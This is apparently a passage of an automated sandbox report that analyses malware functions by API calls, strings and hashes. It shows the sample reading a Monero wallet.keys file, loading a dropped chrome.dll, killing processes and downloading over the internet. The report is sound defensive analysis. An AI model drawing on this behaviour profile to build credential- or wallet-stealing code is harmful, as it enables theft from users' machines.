                                    • C:\ProgramData\chrome.dll, xrefs: 00C908CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 7b9bf5edd1bcbe7676f8079cf59ca03b07e251b21e1d85aecdc14d4c51cbafe3
                                    • Instruction ID: 4f8a60417f96fc15471812faffbb3c5b647f8abcb45430d0842226f2c1afec0c
                                    • Opcode Fuzzy Hash: 7b9bf5edd1bcbe7676f8079cf59ca03b07e251b21e1d85aecdc14d4c51cbafe3
                                    • Instruction Fuzzy Hash: 42A153717002089FCF28FF64D996AAD77BAAF95304F10816DE80A9F251DE309A05DBD6
                                    Function 00C89E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                    • wsprintfA.USER32 ref: 00C89E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C89F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C89F17
                                    • lstrcat.KERNEL32(00000000,00CA12D8), ref: 00C89F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00C89F7C
                                    • Sleep.KERNEL32(00001388), ref: 00C8A013
                                      • Part of subcall function 00C999A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C999C5
                                      • Part of subcall function 00C999A0: Process32First.KERNEL32(00C8A056,00000128), ref: 00C999D9
                                      • Part of subcall function 00C999A0: Process32Next.KERNEL32(00C8A056,00000128), ref: 00C999F2
                                      • Part of subcall function 00C999A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C99A4E
                                      • Part of subcall function 00C999A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C99A6C
                                      • Part of subcall function 00C999A0: CloseHandle.KERNEL32(00000000), ref: 00C99A79
                                      • Part of subcall function 00C999A0: CloseHandle.KERNEL32(00C8A056), ref: 00C99A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: 290d968b46ccb8bf595a6338e3dcd813e1a98d551ca80cb615ad4e5f9cc2330a
                                    • Instruction ID: 2e89528bea993aaf85a614eaa54ee453f891b2d88424f15414b4c532f158e7bf
                                    • Opcode Fuzzy Hash: 290d968b46ccb8bf595a6338e3dcd813e1a98d551ca80cb615ad4e5f9cc2330a
                                    • Instruction Fuzzy Hash: E251A7B1944308ABEB20EB60DC4AFDA7778AF44700F044598F60DAB2C1EB75AB84DF55
                                    Function 00CFF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00CFFA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00CFFA27
                                    • _ValidateLocalCookies.LIBCMT ref: 00CFFAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00CFFADB
                                    • _ValidateLocalCookies.LIBCMT ref: 00CFFB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: b4f1169887d70d7ad67b310bdaeeea29dbada9310d3406890c396f052dd0536a
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: 3D41A63190011DEBCF50DF68C884BADBBB5FF45314F148169EA1CAB392D7319A06DBA2
                                    Function 00C85000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C8501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C85021
                                    • InternetOpenA.WININET(00CA0DE3,00000000,00000000,00000000,00000000), ref: 00C8503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C85061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C85091
                                    • InternetCloseHandle.WININET(?), ref: 00C85109
                                    • InternetCloseHandle.WININET(?), ref: 00C85116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: d61b4f0179fabe602ee5fb0f56898dbdc83efa349c4263e6e90409b2ab2b268f
                                    • Instruction ID: e7b82cf0b1d5d786b1e47d262f08220fd4556f8166fbf959da499da30ffae876
                                    • Opcode Fuzzy Hash: d61b4f0179fabe602ee5fb0f56898dbdc83efa349c4263e6e90409b2ab2b268f
                                    • Instruction Fuzzy Hash: 52311AB4A0421CABDB20DF54DC85BDDB7B4AB48305F1081D8F709A7280CBB06EC59F98
                                    Function 00C9856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C985B6
                                    • wsprintfA.USER32 ref: 00C985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C9860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C9861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C98629
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,0152DCB0,00000000,000F003F,?,00000400), ref: 00C9867C
                                    • lstrlen.KERNEL32(?), ref: 00C98691
                                    • RegQueryValueExA.ADVAPI32(00000000,0152DC20,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CA0B3C), ref: 00C98729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C98798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C987AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: a5ce422c084053a119ca3730587760caffc603a1a106a54bea21dcc9b20b48cc
                                    • Instruction ID: b726afb7407c9b0cf5345d9e95c65b6cc125be6faf8b6e2f2eea53c926e67912
                                    • Opcode Fuzzy Hash: a5ce422c084053a119ca3730587760caffc603a1a106a54bea21dcc9b20b48cc
                                    • Instruction Fuzzy Hash: E521E471A1421CABDB24DB54DC89FE9B3B8FB48705F1081D8B609A6180DF71AA85DFE4
                                    Function 00C999A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C999C5
                                    • Process32First.KERNEL32(00C8A056,00000128), ref: 00C999D9
                                    • Process32Next.KERNEL32(00C8A056,00000128), ref: 00C999F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C99A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C99A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00C99A79
                                    • CloseHandle.KERNEL32(00C8A056), ref: 00C99A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: cbd953f318218af1c2f9aebc2040ce98f58aa1ddefe7ce8f80a6e472cae55aa4
                                    • Instruction ID: 4e7ce8247ba4a6ab1471c9513d767600e1f9097c2cf02e43241c4adf9fb65450
                                    • Opcode Fuzzy Hash: cbd953f318218af1c2f9aebc2040ce98f58aa1ddefe7ce8f80a6e472cae55aa4
                                    • Instruction Fuzzy Hash: DA21E971904318ABDF25EFA5DC89BDDB7B9FB48301F1041C8E609A6290DB749B84DF50
                                    Function 00C97820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C9783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,0151B930,00000000,00020119,00000000), ref: 00C9786D
                                    • RegQueryValueExA.ADVAPI32(00000000,0152DD28,00000000,00000000,?,000000FF), ref: 00C9788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C97898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: e026329a8958bdb15e814ce839d6e6f6d1811501d37d7ee3c5cc28d0cf4f99d2
                                    • Instruction ID: dc05fa2f67a9ba03ffdabdccabddb1042dceb1ae010f8ea596046e1f6edd78ae
                                    • Opcode Fuzzy Hash: e026329a8958bdb15e814ce839d6e6f6d1811501d37d7ee3c5cc28d0cf4f99d2
                                    • Instruction Fuzzy Hash: DC014F75A09309BBEB00EBE4ED4EF6E7778EB48701F104194FB15E7280EA709A00EB54
                                    Function 00C978B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C978C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C978CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,0151B930,00000000,00020119,00C97849), ref: 00C978EB
                                    • RegQueryValueExA.ADVAPI32(00C97849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C9790A
                                    • RegCloseKey.ADVAPI32(00C97849), ref: 00C97914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 7b694c5c2ed4d3350def1d89f83a9ee86c37d6ab9f85f0248efea858a3210988
                                    • Instruction ID: 3f263af1912634ae4c3ac0053dd60ae559dd8c4161ad52b725d9766fa9070295
                                    • Opcode Fuzzy Hash: 7b694c5c2ed4d3350def1d89f83a9ee86c37d6ab9f85f0248efea858a3210988
                                    • Instruction Fuzzy Hash: 0501FFB5A44309BBEB00EBE4EC4AFAEB778EB44701F104595F715A7281DB706A00EB90
                                    Function 00C8A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                    • LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: d93e754244591d0f70f5c6b63233bd51b3da1146b4d25684562fa56dff12c7a1
                                    • Instruction ID: 5c244a2cc4708872ddb4a4d89550982b8c9526bcec7cf45ae012e95193942f03
                                    • Opcode Fuzzy Hash: d93e754244591d0f70f5c6b63233bd51b3da1146b4d25684562fa56dff12c7a1
                                    • Instruction Fuzzy Hash: FD315C74A00308EFDB10EFA0D889BEE7BB5FF48305F108159E911A7290D774AA80CFA5
                                    Function 00C949D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,0152DE78), ref: 00C94A2B
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
